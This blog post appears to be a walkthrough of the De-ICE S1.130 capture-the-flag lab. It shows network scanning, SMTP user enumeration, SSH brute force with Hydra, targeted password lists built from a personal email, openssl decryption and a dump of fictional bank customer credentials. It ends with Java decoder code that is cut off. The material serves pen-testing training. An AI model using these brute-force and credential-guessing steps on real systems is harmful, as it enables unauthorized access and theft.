While digging though an old external drive I found the De-ICE LiveCD’s and walkthrough text files I had put together a few years ago. They are really simple; each one is a link to download the ISO, some non-spoiler information to get started, and spoilers on the off chance that you get stuck on some part of the challenge.
Personally, I learned a lot about post exploitation from some of the challenges in De-ICE. This one was short and sweet, not to many flags to deal with. All of the spoilers are in the walkthrough as not to ruin the pen testing fun. Have fun and hopefully these are helpful.
SE-ICE S1.130
Download Link: http://hackingdojo.com/downloads/iso/De-ICE_S1.130.iso
Default IP: Not so fast buddy, that is one of the flags
Flags:
1. Find default IP for system
2. Obtain access to the file system
3. Final Flag: Obtain the new user accounts bank information
Spoilers and Walkthrough
Port scan the image to get started. At this point I was having everyone do this through the metasploit console instead of stand alone.
msfconsole
workspace deice
db_nmap -sS -F -T4 --exclude 192.168.1.128 192.168.1.0/24
You will need to exclude your own IP, 192.168.1.128 is mine. If you are running any other known systems on your network add them to the exclude with a comma to separate the list.
msf > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
192.168.1.1 00:50:56:c0:00:08 Unknown device
192.168.1.2 00:50:56:e6:1d:4b Unknown device
192.168.1.20 00:0c:29:a4:37:1e Unknown device
192.168.1.123 00:0c:29:a4:37:1e slax Linux 2.6.X server
.1 and .2 are the VMWare NAT. You can check those but trust me. .123 is a different De-ICE LiveCD that is included in the same database because I’m lazy. Looks like 192.168.1.20 is the one.
netdiscover is another tool that looks for ARP requests to discover live hosts. While it isn’t integrated into metasploit I’ve used it on penetration tests to locate hosts for zero knowledge internal tests.
netdiscover
Currently scanning: 192.168.66.0/16 | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.1.1 00:50:56:c0:00:08 1 60 Unknown vendor
192.168.1.2 00:50:56:e7:84:3f 1 60 Unknown vendor
192.168.1.20 00:0c:29:1f:c6:f0 1 60 Unknown vendor
192.168.1.254 00:50:56:f9:37:34 1 60 Unknown vendor
The -sV and -O combination is the same as -A but I’ve separated it out just to have this line of text to tell you that. When I originally did these walkthrough the notes because progressively less detailed since the small group was getting better each week. Since these are now stand alone I will add a little more detail hence the time mismatch.
msf > db_nmap -sV -O -F 192.168.1.20
[*] Nmap: Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-06 00:08 EDT
[*] Nmap: Nmap scan report for 192.168.1.20
[*] Nmap: Host is up (0.00058s latency).
[*] Nmap: Not shown: 93 filtered ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 21/tcp open ftp vsftpd 2.0.4
[*] Nmap: 22/tcp open ssh OpenSSH 4.3 (protocol 1.99)
[*] Nmap: 25/tcp open smtp Sendmail 8.13.7/8.13.7
[*] Nmap: 80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
[*] Nmap: 110/tcp open pop3 Openwall popa3d
[*] Nmap: 143/tcp open imap UW imapd 2004.357
[*] Nmap: 443/tcp closed https
[*] Nmap: MAC Address: 00:0C:29:1F:C6:F0 (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Linux 2.6.X
[*] Nmap: OS CPE: cpe:/o:linux:linux_kernel:2.6
[*] Nmap: OS details: Linux 2.6.13 - 2.6.32
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: Host: slax.example.net; OS: Unix
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 12.03 seconds
In a normal penetration test, if this was the only host in scope, I would dig through the FTP and HTTP sites for data in parallel to performing vulnerability identification. We have used the Nikto web vulnerability scanner in the past and will use it again for this test. Nikto uses a custom User Agent string Mozilla/5.00 (Nikto/@VERSION) (Evasions:@EVASIONS) (Test:@TESTID). This can be changed in the /etc/nikto.conf file or the scan can be piped through the Burp proxy and used to change the User Agent. Most network security appliances and hardened web servers will not give good results to Nikto scans since it is known bad traffic.
nikto -h 192.168.1.20
http://192.168.1.20/info.php has good info. The /info.php page is good on any test and will usually be a finding in the penetration test report.
Logging into the FTP site as anonymous throws an error so no viable path there.
Connected to 192.168.1.20.
220 (vsFTPd 2.0.4)
Name (192.168.1.20:root): anonymous
230 Login successful.
ftp> ls
215 UNIX Type: L8
500 OOPS: vsf_sysutil_recv_peek
In parallel start a password attack on SSH using rockyou and root. See the S1.100 Tutorial for info on how to set it up. While the brute force attack runs, lets look at some other low hanging fruit.
Lets start by looking at the SMTP server.
use auxiliary/scanner/smtp/smtp_enum
The SMTP server pops back some good info, lets follow that rabbit hole down. We have one possible username from the website (customerserviceadmin@nosecbank.com). Lets build out a list for potential attacks.
customerserviceadmin |
---|
customeradmin |
csadmin |
adm |
bin |
daemon |
dbadmin |
ftp |
gdm |
operator |
postmaster |
sysadmin |
webmaster |
After some time passes you should return a password. I used xHydra so show the GUI interface but any password cracking tool will work.
[DATA] attacking service ssh on port 22
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://192.168.1.20:22
[INFO] Successful, password authentication is supported by ssh://192.168.1.20:22
[22][ssh] host: 192.168.1.20 login: csadmin password: rocker
SSH to the server using ssh csadmin@192.168.1.20 and rifle through the file system.
csadmin@192.168.1.20's password:
Linux 2.6.16.
csadmin@slax:~$ ls
mailserv_download/
csadmin@slax:~$ cd mailserv_download/
csadmin@slax:~/mailserv_download$ ls
2010122014234.j12Gqo4H049241 2010122216451.f81Ltw4R010211.part2
Multiple file names … part2 … better figure that out next. Maybe, I can just read the text part with cat.
csadmin@slax:~/mailserv_download$ cat *
To: csadmin@nosecbank.com
CC:
Subject: My Son's Birthday
Date: Mon, 20 Dec 2010 14:23:46 +0500
Return-Path: <sdadmin@nosecbank.com>
Delivered-To: csadmin:nosecbank.com@nosecbank.com
Received: (qmail 20281 invoked from network); 20 Dec 2010 09:23:46 -0000
X-Received: from network (192.168.1.123) by mailserv1-3.us6.service.com;
20 Dec 2010 09:23:46 -0000
Received: from www.nosecbank.com (unknown [198.65.139.34]) by
srv5.us6.service.com (Postfix) with ESMTP id D98402459DD for
<csadmin@nosecbank.com>; Mon, 20 Dec 2010 09:23:46 +0000 (GMT)
Message-Id: <2010122014234.j12Gqo4H049241@www.nosecbank.com>
Mime-Version: 1.0
Content-Type: multipart/alternative;
boundary="---=_NextPart_000_0000_02F24S11.FEPQRE80"
X-Mailer: K-Mail; Build 1.0.5510
Thread-Index: Qw2cWVmE3odZs3TqTTqFvS1e3lexms==
Message: Hey Mark, I am curious if you would be free to come over and
visit for my son Donovin's birthday tomorrow after work. I would also
appreciate if you brought Andy with you as well, because Donny
really enjoyed playing with him last time he was over. I know its short
notice but he is turning 12 and it is special for both him and me. Let
me know if this works. Thanks! -Paul
///////////////------ ERROR: MESSAGE CORRUPTED -------///////////////
///////////////------ ERROR: MESSAGE CORRUPTED -------///////////////
///////////////------ ERROR: MESSAGE CORRUPTED -------///////////////
Lets build a second attack based on the content of that email.
Username
sdadmin
Passwords
donovin
Donovin
donovin21
Donovin21
donovin98
Donovin98
donovin1221
Donovin1221
donovin122198
Donovin122198
donovin12211998
Donovin12211998
donovin211998
Donovin211998
donovin1998
Donovin1998
Second verse same as the first. From checking the home folder you know that Fred is the databaser. As a life pro tip, don’t trust people like Fred.
dbadmin
|
databaser |
Databaser |
databaser1 |
databaser2 |
databaser3 |
databaser4 |
databaser5 |
databaser6 |
databaser7 |
databaser8 |
databaser9 |
databaser0 |
databaser! |
databaser@ |
databaser# |
databaser$ |
databaser% |
databaser^ |
databaser& |
databaser* |
databaser( |
databaser) |
Databaser1 |
Databaser2 |
Databaser3 |
Databaser4 |
Databaser5 |
Databaser6 |
Databaser7 |
Databaser8 |
Databaser9 |
Databaser0 |
Databaser! |
Databaser@ |
Databaser# |
Databaser$ |
Databaser% |
Databaser^ |
Databaser& |
Databaser* |
Databaser( |
Databaser) |
databaser10 |
databaser11 |
databaser12 |
databaser13 |
databaser14 |
databaser15 |
databaser16 |
databaser17 |
databaser18 |
databaser19 |
databaser20 |
databaser21 |
databaser22 |
databaser23 |
databaser24 |
databaser25 |
databaser26 |
databaser27 |
databaser28 |
databaser29 |
databaser30 |
databaser31 |
databaser32 |
databaser33 |
databaser34 |
databaser35 |
databaser36 |
databaser37 |
databaser38 |
databaser39 |
databaser40 |
databaser41 |
databaser42 |
databaser43 |
databaser44 |
databaser45 |
databaser46 |
databaser47 |
databaser48 |
databaser49 |
databaser50 |
databaser51 |
databaser52 |
databaser53 |
databaser54 |
databaser55 |
databaser56 |
databaser57 |
databaser58 |
databaser59 |
databaser60 |
databaser61 |
databaser62 |
databaser63 |
databaser64 |
databaser65 |
databaser66 |
databaser67 |
databaser68 |
databaser69 |
databaser70 |
databaser71 |
databaser72 |
databaser73 |
databaser74 |
databaser75 |
databaser76 |
databaser77 |
databaser78 |
databaser79 |
databaser80 |
databaser81 |
databaser82 |
databaser83 |
databaser84 |
databaser85 |
databaser86 |
databaser87 |
databaser88 |
databaser89 |
databaser90 |
databaser91 |
databaser92 |
databaser93 |
databaser94 |
databaser95 |
databaser96 |
databaser97 |
databaser98 |
databaser99 |
Databaser10 |
Databaser11 |
Databaser12 |
Databaser13 |
Databaser14 |
Databaser15 |
Databaser16 |
Databaser17 |
Databaser18 |
Databaser19 |
Databaser20 |
Databaser21 |
Databaser22 |
Databaser23 |
Databaser24 |
Databaser25 |
Databaser26 |
Databaser27 |
Databaser28 |
Databaser29 |
Databaser30 |
Databaser31 |
Databaser32 |
Databaser33 |
Databaser34 |
Databaser35 |
Databaser36 |
Databaser37 |
Databaser38 |
Databaser39 |
Databaser40 |
Databaser41 |
Databaser42 |
Databaser43 |
Databaser44 |
Databaser45 |
Databaser46 |
Databaser47 |
Databaser48 |
Databaser49 |
Databaser50 |
Databaser51 |
Databaser52 |
Databaser53 |
Databaser54 |
Databaser55 |
Databaser56 |
Databaser57 |
Databaser58 |
Databaser59 |
Databaser60 |
Databaser61 |
Databaser62 |
Databaser63 |
Databaser64 |
Databaser65 |
Databaser66 |
Databaser67 |
Databaser68 |
Databaser69 |
Databaser70 |
Databaser71 |
Databaser72 |
Databaser73 |
Databaser74 |
Databaser75 |
Databaser76 |
Databaser77 |
Databaser78 |
Databaser79 |
Databaser80 |
Databaser81 |
Databaser82 |
Databaser83 |
Databaser84 |
Databaser85 |
Databaser86 |
Databaser87 |
Databaser88 |
Databaser89 |
Databaser90 |
Databaser91 |
Databaser92 |
Databaser93 |
Databaser94 |
Databaser95 |
Databaser96 |
Databaser97 |
Databaser98 |
Databaser99 |
Hey look .part1 lets put all that together. I had to cook this part from another walkthrough because java programming is not my forte. The code can be found at the bottom of this post, I named the file Decoder.java but you can be as creative as you want.
javac Decoder.java
java Decoder sysadmin
java Decoder root
Once you find this file (useracc_update.csv.enc) try the openssl decryption similar to earlier de-ice challenges. Hint look in the sysadmin profile.
root@slax:/home/ftp/incoming# openssl enc -aes-128-cbc -d -in useracc_update.csv.enc -out useracc_update.csv
enter aes-128-cbc decryption password:
bad decrypt
25228:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:evp_enc.c:461:
root@slax:/home/ftp/incoming# openssl enc -aes-256-cbc -d -in useracc_update.csv.enc -out useracc_update.csv
enter aes-256-cbc decryption password:
bad decrypt
25311:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:evp_enc.c:461:
root@slax:/home/ftp/incoming# openssl enc -aes-256-cbc -d -in useracc_update.csv.enc -out useracc_update.csv -k 31/Fwxw+2
root@slax:/home/ftp/incoming# cat user
useracc_update.csv useracc_update.csv.enc
root@slax:/home/ftp/incoming# cat useracc_update.csv
ID,Last,First,Email,State,Username,Password,Verifacation Code,Pin code
1000,Carr,Alfred,acarr23@gmail.com,NY,acarr9096,phantom4,952733,490
1001,Karson,William,wkarson53@yahoo.com,NY,wkarson2431,rockallday123,567094,345
1002,Wheeler,Cordy,megawheels98@rocketmail.com,NY,cwheeler5031,goeagles90,462724,631
1003,Smith,Ken,synthesizer_1r@gmail.com,NY,ksmith6253,crystalization,636721,353
1004,Quinn,Cynthia,qcq92@aol.com,NY,cquinn1217,archyandhenry,680247,223
1005,Floyd,Wilson,jukeboxer_4life@gmail.com,NY,wfloyd5931,knockout66,521456,441
1006,Blake,Markus,sil3nt_gunn3r@yahoo.com,NY,mblake6947,268768924,129632,557
1007,Nash,Jillian,wiselife141@aol.com,NY,jnash0934,checkitout1,324672,315
1008,Atkins,Alison,double_a44@hotmail.com,NY,aatkins9087,gogogo123123,457094,124
1009,Oliver,Frank,fog_of_war0001@gmail.com,NY,foliver9385,falconpunch,783143,134
1010,Jones,Edith,msjones677@hotmail.com,NY,ejones7532,chris12345,632620,579
1011,Moore,Cody,aiprojectx@gmail.com,NY,dot_Cipher,crypTrace,101010,1337
That is the last flag, this challenge was personally tough because of all the Java code and encryption involved which aren’t in my normal day to day penetration tests.
import java.io.*;
public class deice
{
public static void main(String[] args)
{
try
{
System.out.println("[*] Password Generator");
BufferedReader in=new BufferedReader(new InputStreamReader(System.in));
System.out.print("[?] Username: ");
String input=in.readLine();
int[] output=processLoop(input);
String outputASCII="";
for(int i=0; i